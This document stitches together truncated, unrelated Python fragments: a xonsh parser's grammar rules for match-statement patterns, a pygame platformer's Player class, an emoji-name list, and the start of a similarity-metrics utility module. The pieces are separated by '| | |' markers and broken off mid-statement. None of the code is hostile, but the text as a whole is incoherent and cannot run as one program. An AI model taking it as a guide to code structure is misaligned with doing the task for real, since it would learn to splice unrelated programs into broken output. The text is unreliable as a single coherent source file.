ctx=ast.Load(),
**self.get_line_cols(p, 1),
)
case _:
raise AssertionError()
# patterns
def p_closed_pattern(self, p):
"""
closed_pattern : literal_pattern
| capture_and_wildcard_pattern
| group_pattern
| sequence_pattern
| value_pattern
| class_pattern
| mapping_pattern
"""
# productions from closed_pattern to regex_pattern and safe_transform_pattern are located below
p[0] = p[1]
def p_patterns(self, p):
"""
patterns : pattern
| open_sequence_pattern
"""
p[0] = p[1]
def p_pattern(self, p):
"""
pattern : or_pattern
| as_pattern
"""
p[0] = p[1]
def p_or_pattern(self, p):
"""
or_pattern : or_pattern_list
"""
_, or_pattern_list = p
match or_pattern_list:
case [single_value]:
p[0] = single_value
case multiple_values:
p[0] = ast.MatchOr(patterns=multiple_values, **self.get_line_cols(p, 1))
def p_or_pattern_list(self, p):
"""
or_pattern_list : closed_pattern
| closed_pattern PIPE or_pattern_list
"""
match list(p):
case [_, closed_pattern]:
p[0] = [closed_pattern]
case [_, closed_pattern, "|", or_pattern_list]:
p[0] = [closed_pattern] + or_pattern_list
# group pattern
def p_group_pattern(self, p):
"""
group_pattern : LPAREN pattern RPAREN
"""
_, _, pattern, _ = p
p[0] = pattern
# literal pattern
def p_literal_pattern(self, p):
"""
literal_pattern : literal_expr
"""
match p[1]:
case None | True | False:
p[0] = ast.MatchSingleton(value=p[1], **self.get_line_cols(p, 1))
case _:
p[0] = ast.MatchValue(value=p[1], **self.get_line_cols(p, 1))
def p_literal_expr_number_or_string_literal_list(self, p):
"""
literal_expr : complex_number
| string_literal_list
"""
p[0] = p[1]
match p[1]:
case ast.JoinedStr():
raise AssertionError("patterns may not match formatted string literals")
# TODO: raise SyntaxError instead
# (doing so currently somehow causes an IndexError in tools.py:get_logical_line)
# TODO: f"hi" "hi" does not parse in xonsh
def p_literal_expr_none_or_true_or_false(self, p):
"""
literal_expr : none_tok
| true_tok
| false_tok
"""
match p[1].value:
case "None":
value = None
case "True":
value = True
case "False":
value = False
case _:
raise AssertionError()
p[0] = value
def p_complex_number(self, p):
"""
complex_number : number
| MINUS number
| number PLUS number
| number MINUS number
| MINUS number PLUS number
| MINUS number MINUS number
"""
ops = {"+": ast.Add(), "-": ast.Sub()}
build_complex = False
loc = self.get_line_cols(p, 1)
match list(p):
case [_, x]:
p[0] = x
case [_, "-", x]:
p[0] = ast.UnaryOp(op=ast.USub(), operand=x, **loc)
case [_, left, ("+" | "-") as op_char, right]:
build_complex = True
negate_left_side = False
case [_, "-", left, ("+" | "-") as op_char, right]:
build_complex = True
negate_left_side = True
case _:
raise AssertionError()
if build_complex:
# TODO raise syntax error instead (see reason in p_literal_expr_number_or_string_literal_list)
assert isinstance(
right.value, complex
), "right part of complex literal must be imaginary"
if negate_left_side:
left = ast.UnaryOp(op=ast.USub(), operand=left, **loc)
p[0] = ast.BinOp(left=left, op=ops[op_char], right=right, **loc)
# capture- and wildcard-pattern
def p_as_pattern(self, p):
"""
as_pattern : or_pattern AS capture_target_name
"""
_, or_pattern, _, name = p
p[0] = ast.MatchAs(pattern=or_pattern, name=name, **self.get_line_cols(p, 1))
def p_capture_target_name(self, p):
"""
capture_target_name : name_str
"""
name = p[1]
if name == "_":
self._set_error_at_production_index(
"can't capture name '_' in patterns", p, 1
)
p[0] = name
def p_capture_and_wildcard_pattern(self, p):
"""
capture_and_wildcard_pattern : name_str
"""
# TODO: according to the spec we would need the negative lookahead !('.' | '(' | '=')
# (also in p_star_pattern, p_value_pattern)
# but parsing seems to work just fine
_, name = p
target = name if name != "_" else None
p[0] = ast.MatchAs(name=target, **self.get_line_cols(p, 1))
# sequence pattern
def p_sequence_pattern_square_brackets(self, p):
"""
sequence_pattern : LBRACKET maybe_sequence_pattern RBRACKET
| LBRACKET RBRACKET
| LPAREN open_sequence_pattern RPAREN
| LPAREN RPAREN
"""
match list(p):
case [_, _, ast.MatchSequence() as seq, _]:
p[0] = seq
case [_, _, single_item, _]:
p[0] = ast.MatchSequence(
patterns=[single_item], **self.get_line_cols(p, 1)
)
case [_, _, _]:
p[0] = ast.MatchSequence(patterns=[], **self.get_line_cols(p, 1))
case _:
raise AssertionError()
def p_maybe_sequence_pattern(self, p):
"""
maybe_sequence_pattern : maybe_star_pattern comma_opt
| maybe_star_pattern COMMA maybe_sequence_pattern
"""
match list(p):
case [_, maybe_star_pattern, ","]:
p[0] = ast.MatchSequence(
patterns=[maybe_star_pattern], **self.get_line_cols(p, 1)
)
case [_, maybe_star_pattern, None]:
p[0] = maybe_star_pattern
case [
_,
maybe_star_pattern,
",",
ast.MatchSequence(patterns=list(maybe_sequence_pattern)),
]:
p[0] = ast.MatchSequence(
patterns=[maybe_star_pattern] + maybe_sequence_pattern,
**self.get_line_cols(p, 1),
)
case [_, maybe_star_pattern, ",", maybe_sequence_pattern]:
p[0] = ast.MatchSequence(
patterns=[maybe_star_pattern, maybe_sequence_pattern],
**self.get_line_cols(p, 1),
)
case _:
raise AssertionError()
def p_open_sequence_pattern(self, p):
"""
open_sequence_pattern : maybe_star_pattern COMMA
| maybe_star_pattern COMMA maybe_sequence_pattern
"""
self.p_maybe_sequence_pattern(p)
def p_maybe_star_pattern(self, p):
"""
maybe_star_pattern : pattern
| star_pattern
"""
p[0] = p[1]
def p_star_pattern(self, p):
"""
star_pattern : TIMES name_str
"""
_, _, name = p
target = name if name != "_" else None
p[0] = ast.MatchStar(name=target, **self.get_line_cols(p, 1))
def p_value_pattern(self, p):
"""
value_pattern : attr_name_with
"""
p[0] = ast.MatchValue(value=p[1], **self.get_line_cols(p, 1))
# This is implemented via this 'chain' grammer since implementing the grammar from the spec verbatim leads to bad parser states (regarding comma tokens)
def p_class_pattern(self, p):
"""
class_pattern : attr_name LPAREN class_pattern_positional_part_start RPAREN
"""
positional_patterns, keyword_patterns_key_value_tuple_list = p[3]
if keyword_patterns_key_value_tuple_list:
# transpose, e.g. [ (a, 1), (b, 2) ] to [a, b], [1, 2]
kwd_attrs, kwd_patterns = list(zip(*keyword_patterns_key_value_tuple_list))
else:
kwd_attrs, kwd_patterns = [], []
p[0] = ast.MatchClass(
cls=p[1],
patterns=positional_patterns,
kwd_attrs=list(kwd_attrs),
kwd_patterns=list(kwd_patterns),
**self.get_line_cols(p, 1),
)
# returns ( [pattern], [ (name, pattern) ] )
def p_class_pattern_positional_part_start(self, p):
"""
class_pattern_positional_part_start :
| pattern
| pattern COMMA class_pattern_positional_part
| name_str EQUALS pattern
| name_str EQUALS pattern COMMA class_pattern_keyword_part
"""
match list(p):
case [_]:
p[0] = ([], [])
case [_, pattern]:
p[0] = ([pattern], [])
case [_, pattern, ",", (names, patterns)]:
p[0] = ([pattern] + names, patterns)
case [_, name, "=", pattern]:
p[0] = ([], [(name, pattern)])
case [_, name, "=", pattern, ",", class_pattern_keyword_part]:
p[0] = ([], [(name, pattern)] + class_pattern_keyword_part)
case _:
raise AssertionError()
# returns ( [pattern], [ (name, pattern) ] )
def p_class_pattern_positional_part_skip(self, p):
"""
class_pattern_positional_part : class_pattern_keyword_part
"""
p[0] = ([], p[1])
# returns ( [pattern], [ (name, pattern) ] )
def p_class_pattern_positional_part(self, p):
"""
class_pattern_positional_part : pattern
| pattern COMMA class_pattern_positional_part
"""
match list(p):
case [_, pattern]:
p[0] = ([pattern], [])
case [_, pattern, ",", (names, patterns)]:
p[0] = ([pattern] + names, patterns)
case _:
raise AssertionError()
# returns [ (name, pattern) ]
def p_class_pattern_keyword_part(self, p):
"""
class_pattern_keyword_part :
| COMMA
| name_str EQUALS pattern
| name_str EQUALS pattern COMMA class_pattern_keyword_part
"""
match list(p):
case [_] | | |
<gh_stars>0
import math
import time
import random
import os.path
from pygame.locals import *
from pygame.math import Vector2
from abc import ABC
from projectSS.spritesheet import *
# Abstract entity class
class Entity(pygame.sprite.Sprite, ABC):
def __init__(self, gameplay_screen, *groups):
super().__init__(groups)
self.gameplay_screen = gameplay_screen
self.game = gameplay_screen.game
self.surf = pygame.Surface((0, 0))
self.rect = self.surf.get_rect()
self.rect_render = self.surf.get_rect()
self.pos = Vector2(0, 0)
self.last_pos = self.pos
def update(self):
if self.pos.y > self.gameplay_screen.despawn_y:
self.kill()
self.update_rect()
def update_rect(self):
self.rect = self.surf.get_rect(center=self.pos)
self.rect_render = self.surf.get_rect(
center=(self.pos.x, self.pos.y - self.gameplay_screen.camera_y))
def render(self):
self.game.screen.blit(self.surf, self.rect_render)
# For now, player will be represented with red squares.
class Player(Entity):
def __init__(self, gameplay_screen):
super().__init__(gameplay_screen)
# This can be refactor if needed, but uses the Spritesheet class to load and pick out images
abs_dir = os.path.dirname(__file__)
self.player_spritesheet = Spritesheet(os.path.join(abs_dir, 'assets/player_spritesheet.png'))
# Variables for animation/switching of sprites
self.play_walk = False
self.play_jump = False
self.current_frame = 0
self.last_update = 0
# Variable to detect what was the last direction the player moved (Either left or right) F = left, T = right
self.last_direction = False
# To reduce clutter in init all frames images are put in load_images()
self.load_images()
# surf used to be the rectangle/square player and now is changed to hold the first frame of idle sprite
# surf variable will be changed often for each different frame of animation
self.surf = self.idle_walk_frames_r[0]
# Rendering surface
# self.surf = pygame.Surface((30, 30))
# self.surf.fill((237, 55, 55))
# Velocity and acceleration variables
self.vel = Vector2(0, 0)
self.acc = Vector2(0, 0)
self.alive = True
self.won = False
self.hit = False
self.on_ground = False
self.jumping = False
self.jumped = False
self.pushed = False
self.push_time = 0
# Physics constants
self.ACCELERATION = 0.5
self.FRICTION = 0.1
self.AIR_FRICTION = 0.06
self.GRAVITY = 0.5
self.MAX_FALL_VELOCITY = 15
# Power-up effects
self.boosted = False
self.immune = False
def load_images(self):
self.idle_walk_frames_l = [self.player_spritesheet.get_image(3, 3, 58, 58),
self.player_spritesheet.get_image(2, 136, 56, 60)]
self.idle_walk_frames_r = [self.player_spritesheet.get_image(137, 3, 58, 58),
self.player_spritesheet.get_image(140, 136, 56, 60)]
self.jump_frames = [self.player_spritesheet.get_image(2, 70, 64, 60),
self.player_spritesheet.get_image(134, 70, 64, 60)]
# IL, IR, WL, WR, JL, JR
self.rhythm_jump_frames = [self.player_spritesheet.get_image(68, 3, 58, 58),
self.player_spritesheet.get_image(204, 3, 58, 58),
self.player_spritesheet.get_image(67, 136, 56, 60),
self.player_spritesheet.get_image(207, 136, 56, 60),
self.player_spritesheet.get_image(66, 69, 64, 60),
self.player_spritesheet.get_image(200, 70, 64, 60)]
self.player_boost_frames = [self.player_spritesheet.get_image(0, 198, 66, 66),
self.player_spritesheet.get_image(66, 198, 66, 66)]
self.invinc_idle_walk_frames_l = [self.player_spritesheet.get_image(0, 264, 66, 63),
self.player_spritesheet.get_image(130, 198, 66, 65)]
self.invinc_idle_walk_frames_r = [self.player_spritesheet.get_image(66, 264, 66, 63),
self.player_spritesheet.get_image(196, 198, 66, 65)]
self.invinc_jump_frames = [self.player_spritesheet.get_image(130, 264, 66, 66),
self.player_spritesheet.get_image(196, 264, 66, 66)]
# IL, WL, IR, WR, JL, JR
self.invinc_rhythm_frames = [self.player_spritesheet.get_image(0, 396, 66, 63),
self.player_spritesheet.get_image(130, 330, 66, 65),
self.player_spritesheet.get_image(66, 396, 66, 63),
self.player_spritesheet.get_image(196, 330, 66, 65),
self.player_spritesheet.get_image(130, 396, 66, 66),
self.player_spritesheet.get_image(196, 396, 66, 66)]
self.invinc_boost = [self.player_spritesheet.get_image(0, 330, 66, 66),
self.player_spritesheet.get_image(66, 330, 66, 66)]
# Reset player variables when starting gameplay
def reset(self):
self.pos.x = self.game.WIDTH / 2
self.pos.y = -64
self.vel.x = 0
self.vel.y = 0
self.acc.x = 0
self.acc.y = 0
self.alive = True
self.won = False
self.hit = False
self.on_ground = False
self.jumping = False
self.jumped = False
self.immune = False
self.boosted = False
self.pushed = False
self.push_time = 0
# This method allows us to control our player. Heavy use of physics and kinematics.
def move(self):
# Reset acceleration, or else player ends up wobbling back and forth
self.acc.x = 0
self.acc.y = 0
# Apply gravity if player is not on a platform
if not self.on_ground:
self.acc.y = self.GRAVITY
# Check if any keyboard keys have been pressed. Modify acceleration/velocity accordingly.
pressed_keys = pygame.key.get_pressed()
if pressed_keys[K_LEFT] or pressed_keys[K_a]:
self.last_direction = False
self.play_walk = True
self.acc.x = -self.ACCELERATION
elif pressed_keys[K_RIGHT] or pressed_keys[K_d]:
self.last_direction = True
self.play_walk = True
self.acc.x = self.ACCELERATION
# Player is holding space key? Jump until max jump height is reached. Space key is let go? Stop jump.
if pressed_keys[K_SPACE] or pressed_keys[K_UP] or pressed_keys[K_w]:
self.jump()
self.jumping = True
self.play_jump = True
else:
self.cancel_jump()
self.jumping = False
self.play_jump = False
# Apply friction
if self.on_ground:
self.acc.x -= self.vel.x * self.FRICTION
else:
self.acc.x -= self.vel.x * self.AIR_FRICTION
# See if player was pushed
if self.pushed:
self.push()
self.pushed = False
# Basic kinematics. They all change based on the acceleration from above.
self.vel += self.acc
self.pos += self.vel + 0.5 * self.acc
# Apply maximum falling velocity
if self.vel.y > self.MAX_FALL_VELOCITY:
self.vel.y = self.MAX_FALL_VELOCITY
# Screen Warping. Player will wrap around screen borders. Can be removed with border acting as barrier.
if self.pos.x > self.game.WIDTH:
self.pos.x = self.pos.x - self.game.WIDTH
if self.pos.x < 0:
self.pos.x = self.game.WIDTH - self.pos.x
# Jump method first check if a player is on a platform before allowing player to jump
def jump(self):
if self.on_ground and not self.jumping:
self.jumped = True
if self.boosted:
self.vel.y = -30
self.boosted = False
self.game.assets["sfx_boostjump"].play()
else:
# On beat jump
if self.gameplay_screen.rhy_on_beat:
self.vel.y = -20
self.vel.x *= 2
self.game.assets["sfx_blip"].play()
if self.last_direction:
if self.immune:
self.surf = self.invinc_rhythm_frames[5]
else:
self.surf = self.rhythm_jump_frames[5]
else:
if self.immune:
self.surf = self.invinc_rhythm_frames[4]
else:
self.surf = self.rhythm_jump_frames[4]
# Off beat jump
else:
self.vel.y = -15
self.game.assets["sfx_jump"].play()
if self.last_direction:
if self.immune:
self.surf = self.invinc_jump_frames[1]
else:
self.surf = self.jump_frames[1]
else:
if self.immune:
self.surf = self.invinc_jump_frames[0]
else:
self.surf = self.jump_frames[0]
def push(self):
self.vel.y = random.randrange(-15, -5)
self.acc.x = random.randrange(-15, 15)
def cancel_jump(self):
if self.jumping:
if self.vel.y < -5:
self.vel.y = -5
def animate_walk(self, direction_frames):
now = pygame.time.get_ticks()
if self.play_walk:
if now - self.last_update > 150:
self.last_update = now
self.current_frame = (self.current_frame + 1) % len(direction_frames)
self.surf = direction_frames[self.current_frame]
def animate(self, left_frames, right_frames):
if not self.play_walk and not self.play_jump:
if self.last_direction:
self.surf = right_frames[0]
else:
self.surf = left_frames[0]
elif self.play_walk:
if self.last_direction:
self.animate_walk(right_frames)
else:
self.animate_walk(left_frames)
def rhythm_jump_animate(self):
if not self.play_walk and not self.play_jump:
if self.last_direction:
if self.immune:
self.surf = self.invinc_rhythm_frames[2]
else:
self.surf = self.rhythm_jump_frames[1]
else:
if self.immune:
self.surf = self.invinc_rhythm_frames[0]
else:
self.surf = self.rhythm_jump_frames[0]
elif self.play_walk:
if self.last_direction:
if self.immune:
self.surf = self.invinc_rhythm_frames[3]
else:
self.surf = self.rhythm_jump_frames[3]
else:
if self.immune:
self.surf = self.invinc_rhythm_frames[1]
else:
self.surf = self.rhythm_jump_frames[2]
# Player platform collision detection & rhythm restart
def update(self):
self.jumped = False
# Update movement
self.move()
# Check for for player death if player falls off of screen
if self.pos.y > self.gameplay_screen.despawn_y:
self.alive = False
return
# Platform collisions
plat_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.platforms, False)
self.on_ground = False
# Ignore collisions if the player jumped this frame
if not self.jumped and plat_collisions:
for p in plat_collisions:
# Place the player on the platform if they are high enough (w/ vel forgiveness) and falling
if self.vel.y >= 0 and self.rect.bottom < p.rect.centery + self.vel.y:
# Set player to be slightly inside platform, otherwise they will jitter
self.pos.y = p.rect.top - ((self.rect.height / 2) - 0.1)
self.vel.y = 0
self.on_ground = True
# Set win if goal platform
if p.goal:
self.won = True
self.update_rect()
if self.boosted:
if self.last_direction:
if self.immune:
self.surf = self.invinc_boost[1]
else:
self.surf = self.player_boost_frames[1]
else:
if self.immune:
self.surf = self.invinc_boost[0]
else:
self.surf = self.player_boost_frames[0]
else:
cur_time = time.time()
# changes to rhythm jump animation when on beat
if self.gameplay_screen.rhy_on_beat:
self.rhythm_jump_animate()
else:
if self.immune:
self.animate(self.invinc_idle_walk_frames_l, self.invinc_idle_walk_frames_r)
else:
self.animate(self.idle_walk_frames_l, self.idle_walk_frames_r)
# Check if player hits powerups
pows_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.powerups, True)
for p in pows_collisions:
self.game.assets["sfx_pickup"].play()
if p.type == 'boost':
self.boosted = True
elif p.type == 'invincible':
self.immune = True
# Check if player hits enemy
enemy_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.enemies, True)
if enemy_collisions:
# If player is in IMMUNE STATE, will lose immunity after hitting 1 enemy
if self.immune:
self.game.assets["sfx_loseshield"].play()
self.immune = False
else:
self.game.assets["sfx_hit"].play()
self.hit = True
for e in enemy_collisions:
e.kill()
# Check if player hits a pusher
push_collisions = pygame.sprite.spritecollide(self, self.gameplay_screen.pushers, False)
for p in push_collisions:
# If player is in IMMUNE STATE, will lose immunity after hitting 1 enemy
if self.immune and time.time() - self.push_time > 1.0:
self.game.assets["sfx_loseshield"].play()
self.push_time = time.time()
self.immune = False
if p.active and time.time() - self.push_time > 1.0:
self.game.assets["sfx_pushed"].play()
self.push_time = time.time()
self.pushed = True
# Walking to Idle Animation transition
if self.last_pos.x + 0.005 >= self.pos.x >= self.last_pos.x - 0.005 and self.on_ground:
self.play_walk = | |
Heart on Fire'],
['❤️‍🩹', ' Mending Heart'],
['❤️', ' Red Heart'],
['🧡', ' Orange Heart'],
['💛', ' Yellow Heart'],
['💚', ' Green Heart'],
['💙', ' Blue Heart'],
['💜', ' Purple Heart'],
['🤎', ' Brown Heart'],
['🖤', ' Black Heart'],
['🤍', ' White Heart'],
['💯', ' Hundred Points'],
['💢', ' Anger Symbol'],
['💬', ' Speech Balloon'],
['👁️‍🗨️', ' Eye in Speech Bubble'],
['🗨️', ' Left Speech Bubble'],
['🗯️', ' Right Anger Bubble'],
['💭', ' Thought Balloon'],
['💤', ' Zzz'],
['💮', ' White Flower'],
['♨️', ' Hot Springs'],
['💈', ' Barber Pole'],
['🛑', ' Stop Sign'],
['🕛', ' Twelve O’Clock'],
['🕧', ' Twelve-Thirty'],
['🕐', ' One O’Clock'],
['🕜', ' One-Thirty'],
['🕑', ' Two O’Clock'],
['🕝', ' Two-Thirty'],
['🕒', ' Three O’Clock'],
['🕞', ' Three-Thirty'],
['🕓', ' Four O’Clock'],
['🕟', ' Four-Thirty'],
['🕔', ' Five O’Clock'],
['🕠', ' Five-Thirty'],
['🕕', ' Six O’Clock'],
['🕡', ' Six-Thirty'],
['🕖', ' Seven O’Clock'],
['🕢', ' Seven-Thirty'],
['🕗', ' Eight O’Clock'],
['🕣', ' Eight-Thirty'],
['🕘', ' Nine O’Clock'],
['🕤', ' Nine-Thirty'],
['🕙', ' Ten O’Clock'],
['🕥', ' Ten-Thirty'],
['🕚', ' Eleven O’Clock'],
['🕦', ' Eleven-Thirty'],
['🌀', ' Cyclone'],
['♠️', ' Spade Suit'],
['♥️', ' Heart Suit'],
['♦️', ' Diamond Suit'],
['♣️', ' Club Suit'],
['🃏', ' Joker'],
['🀄', ' Mahjong Red Dragon'],
['🎴', ' Flower Playing Cards'],
['🔇', ' Muted Speaker'],
['🔈', ' Speaker Low Volume'],
['🔉', ' Speaker Medium Volume'],
['🔊', ' Speaker High Volume'],
['📢', ' Loudspeaker'],
['📣', ' Megaphone'],
['📯', ' Postal Horn'],
['🔔', ' Bell'],
['🔕', ' Bell with Slash'],
['🎵', ' Musical Note'],
['🎶', ' Musical Notes'],
['💹', ' Chart Increasing with Yen'],
['🛗', ' Elevator'],
['🏧', ' ATM Sign'],
['🚮', ' Litter in Bin Sign'],
['🚰', ' Potable Water'],
['♿', ' Wheelchair Symbol'],
['🚹', ' Men’s Room'],
['🚺', ' Women’s Room'],
['🚻', ' Restroom'],
['🚼', ' Baby Symbol'],
['🚾', ' Water Closet'],
['⚠️', ' Warning'],
['🚸', ' Children Crossing'],
['⛔', ' No Entry'],
['🚫', ' Prohibited'],
['🚳', ' No Bicycles'],
['🚭', ' No Smoking'],
['🚯', ' No Littering'],
['🚱', ' Non-Potable Water'],
['🚷', ' No Pedestrians'],
['📵', ' No Mobile Phones'],
['🔞', ' No One Under Eighteen'],
['☢️', ' Radioactive'],
['☣️', ' Biohazard'],
['⬆️', ' Up Arrow'],
['↗️', ' Up-Right Arrow'],
['➡️', ' Right Arrow'],
['↘️', ' Down-Right Arrow'],
['⬇️', ' Down Arrow'],
['↙️', ' Down-Left Arrow'],
['⬅️', ' Left Arrow'],
['↖️', ' Up-Left Arrow'],
['↕️', ' Up-Down Arrow'],
['↔️', ' Left-Right Arrow'],
['↩️', ' Right Arrow Curving Left'],
['↪️', ' Left Arrow Curving Right'],
['⤴️', ' Right Arrow Curving Up'],
['⤵️', ' Right Arrow Curving Down'],
['🔃', ' Clockwise Vertical Arrows'],
['🔄', ' Counterclockwise Arrows Button'],
['🔙', ' Back Arrow'],
['🔚', ' End Arrow'],
['🔛', ' On! Arrow'],
['🔜', ' Soon Arrow'],
['🔝', ' Top Arrow'],
['🛐', ' Place of Worship'],
['⚛️', ' Atom Symbol'],
['🕉️', ' Om'],
['✡️', ' Star of David'],
['☸️', ' Wheel of Dharma'],
['☯️', ' Yin Yang'],
['✝️', ' Latin Cross'],
['☦️', ' Orthodox Cross'],
['☪️', ' Star and Crescent'],
['☮️', ' Peace Symbol'],
['🕎', ' Menorah'],
['🔯', ' Dotted Six-Pointed Star'],
['♈', ' Aries'],
['♉', ' Taurus'],
['♊', ' Gemini'],
['♋', ' Cancer'],
['♌', ' Leo'],
['♍', ' Virgo'],
['♎', ' Libra'],
['♏', ' Scorpio'],
['♐', ' Sagittarius'],
['♑', ' Capricorn'],
['♒', ' Aquarius'],
['♓', ' Pisces'],
['⛎', ' Ophiuchus'],
['🔀', ' Shuffle Tracks Button'],
['🔁', ' Repeat Button'],
['🔂', ' Repeat Single Button'],
['▶️', ' Play Button'],
['⏩', ' Fast-Forward Button'],
['⏭️', ' Next Track Button'],
['⏯️', ' Play or Pause Button'],
['◀️', ' Reverse Button'],
['⏪', ' Fast Reverse Button'],
['⏮️', ' Last Track Button'],
['🔼', ' Upwards Button'],
['⏫', ' Fast Up Button'],
['🔽', ' Downwards Button'],
['⏬', ' Fast Down Button'],
['⏸️', ' Pause Button'],
['⏹️', ' Stop Button'],
['⏺️', ' Record Button'],
['⏏️', ' Eject Button'],
['🎦', ' Cinema'],
['🔅', ' Dim Button'],
['🔆', ' Bright Button'],
['📶', ' Antenna Bars'],
['📳', ' Vibration Mode'],
['📴', ' Mobile Phone Off'],
['♀️', ' Female Sign'],
['♂️', ' Male Sign'],
['✖️', ' Multiply'],
['➕', ' Plus'],
['➖', ' Minus'],
['➗', ' Divide'],
['♾️', ' Infinity'],
['‼️', ' Double Exclamation Mark'],
['⁉️', ' Exclamation Question Mark'],
['❓', ' Question Mark'],
['❔', ' White Question Mark'],
['❕', ' White Exclamation Mark'],
['❗', ' Exclamation Mark'],
['〰️', ' Wavy Dash'],
['💱', ' Currency Exchange'],
['💲', ' Heavy Dollar Sign'],
['⚕️', ' Medical Symbol'],
['♻️', ' Recycling Symbol'],
['⚜️', ' Fleur-de-lis'],
['🔱', ' Trident Emblem'],
['📛', ' Name Badge'],
['🔰', ' Japanese Symbol for Beginner'],
['⭕', ' Hollow Red Circle'],
['✅', ' Check Mark Button'],
['☑️', ' Check Box with Check'],
['✔️', ' Check Mark'],
['❌', ' Cross Mark'],
['❎', ' Cross Mark Button'],
['➰', ' Curly Loop'],
['➿', ' Double Curly Loop'],
['〽️', ' Part Alternation Mark'],
['✳️', ' Eight-Spoked Asterisk'],
['✴️', ' Eight-Pointed Star'],
['❇️', ' Sparkle'],
['©️', ' Copyright'],
['®️', ' Registered'],
['™️', ' Trade Mark'],
['#️⃣', ' Keycap Number Sign'],
['*️⃣', ' Keycap Asterisk'],
['0️⃣', ' Keycap Digit Zero'],
['1️⃣', ' Keycap Digit One'],
['2️⃣', ' Keycap Digit Two'],
['3️⃣', ' Keycap Digit Three'],
['4️⃣', ' Keycap Digit Four'],
['5️⃣', ' Keycap Digit Five'],
['6️⃣', ' Keycap Digit Six'],
['7️⃣', ' Keycap Digit Seven'],
['8️⃣', ' Keycap Digit Eight'],
['9️⃣', ' Keycap Digit Nine'],
['🔟', ' Keycap: 10'],
['🔠', ' Input Latin Uppercase'],
['🔡', ' Input Latin Lowercase'],
['🔢', ' Input Numbers'],
['🔣', ' Input Symbols'],
['🔤', ' Input Latin Letters'],
['🅰️', ' A Button (Blood Type)'],
['🆎', ' AB Button (Blood Type)'],
['🅱️', ' B Button (Blood Type)'],
['🆑', ' CL Button'],
['🆒', ' Cool Button'],
['🆓', ' Free Button'],
['ℹ️', ' Information'],
['🆔', ' ID Button'],
['Ⓜ️', ' Circled M'],
['🆕', ' New Button'],
['🆖', ' NG Button'],
['🅾️', ' O Button (Blood Type)'],
['🆗', ' OK Button'],
['🅿️', ' P Button'],
['🆘', ' SOS Button'],
['🆙', ' Up! Button'],
['🆚', ' Vs Button'],
['🈁', ' Japanese “Here” Button'],
['🈂️', ' Japanese “Service Charge” Button'],
['🈷️', ' Japanese “Monthly Amount” Button'],
['🈶', ' Japanese “Not Free of Charge” Button'],
['🈯', ' Japanese “Reserved” Button'],
['🉐', ' Japanese “Bargain” Button'],
['🈹', ' Japanese “Discount” Button'],
['🈚', ' Japanese “Free of Charge” Button'],
['🈲', ' Japanese “Prohibited” Button'],
['🉑', ' Japanese “Acceptable” Button'],
['🈸', ' Japanese “Application” Button'],
['🈴', ' Japanese “Passing Grade” Button'],
['🈳', ' Japanese “Vacancy” Button'],
['㊗️', ' Japanese “Congratulations” Button'],
['㊙️', ' Japanese “Secret” Button'],
['🈺', ' Japanese “Open for Business” Button'],
['🈵', ' Japanese “No Vacancy” Button'],
['🔴', ' Red Circle'],
['🟠', ' Orange Circle'],
['🟡', ' Yellow Circle'],
['🟢', ' Green Circle'],
['🔵', ' Blue Circle'],
['🟣', ' Purple Circle'],
['🟤', ' Brown Circle'],
['⚫', ' Black Circle'],
['⚪', ' White Circle'],
['🟥', ' Red Square'],
['🟧', ' Orange Square'],
['🟨', ' Yellow Square'],
['🟩', ' Green Square'],
['🟦', ' Blue Square'],
['🟪', ' Purple Square'],
['🟫', ' Brown Square'],
['⬛', ' Black Large Square'],
['⬜', ' White Large Square'],
['◼️', ' Black Medium Square'],
['◻️', ' White Medium Square'],
['◾', ' Black Medium-Small Square'],
['◽', ' White Medium-Small Square'],
['▪️', ' Black Small Square'],
['▫️', ' White Small Square'],
['🔶', ' Large Orange Diamond'],
['🔷', ' Large Blue Diamond'],
['🔸', ' Small Orange Diamond'],
['🔹', ' Small Blue Diamond'],
['🔺', ' Red Triangle Pointed Up'],
['🔻', ' Red Triangle Pointed Down'],
['💠', ' Diamond with a Dot'],
['🔘', ' Radio Button'],
['🔳', ' White Square Button'],
['🔲', ' Black Square Button']
]
# noinspection SpellCheckingInspection
icons_flags = [
['🏁', ' Chequered Flag'],
['🚩', ' Triangular Flag'],
['🎌', ' Crossed Flags'],
['🏴', ' Black Flag'],
['🏳️', ' White Flag'],
['🏳️‍🌈', ' Rainbow Flag'],
['🏳️‍⚧️', ' Transgender Flag'],
['🏴‍☠️', ' Pirate Flag'],
['🇦🇨', ' Flag: Ascension Island'],
['🇦🇩', ' Flag: Andorra'],
['🇦🇪', ' Flag: United Arab Emirates'],
['🇦🇫', ' Flag: Afghanistan'],
['🇦🇬', ' Flag: Antigua & Barbuda'],
['🇦🇮', ' Flag: Anguilla'],
['🇦🇱', ' Flag: Albania'],
['🇦🇲', ' Flag: | |
"""
Commonly used utils:
evaluation metrics e.g. similarity, AUC, AP@k, MAP@k
graph related operation
testing data generator
file I/O
visualization
etc...
"""
import time
import numpy as np
from scipy import sparse
import pickle
import networkx as nx
# -----------------------------------------------------------------------------
# --------------------------------- metrics -----------------------------------
# -----------------------------------------------------------------------------
def cosine_similarity(a, b):
from numpy import dot
from numpy.linalg import norm
''' cosine similarity; can be used as score function; vector by vector;
If consider similarity for all pairs,
pairwise_similarity() implementation may be more efficient
'''
a = np.reshape(a,-1)
b = np.reshape(b,-1)
if norm(a)*norm(b) == 0:
return 0.0
else:
return dot(a, b)/(norm(a)*norm(b))
def pairwise_similarity(mat, type='cosine'):
''' pairwise similarity; can be used as score function;
vectorized computation
'''
if type == 'cosine': # support sparse and dense mat
from sklearn.metrics.pairwise import cosine_similarity
result = cosine_similarity(mat, dense_output=True) # use sparse output to save ROM
elif type == 'jaccard':
from sklearn.metrics import jaccard_similarity_score
from sklearn.metrics.pairwise import pairwise_distances
# n_jobs=-1 means using all CPU for parallel computing
result = pairwise_distances(mat.todense(), metric=jaccard_similarity_score, n_jobs=-1)
elif type == 'euclidean':
from sklearn.metrics.pairwise import euclidean_distances
# note: similarity = - distance
result = euclidean_distances(mat)
result = -result
elif type == 'manhattan':
from sklearn.metrics.pairwise import manhattan_distances
# note: similarity = - distance
result = manhattan_distances(mat)
result = -result
else:
print('Please choose from: cosine, jaccard, euclidean or manhattan')
return 'Not found!'
return result
def auc_score(y_true, y_score):
''' use sklearn roc_auc_score API
y_true & y_score; array-like, shape = [n_samples]
'''
from sklearn.metrics import roc_auc_score
roc = roc_auc_score(y_true=y_true, y_score=y_score)
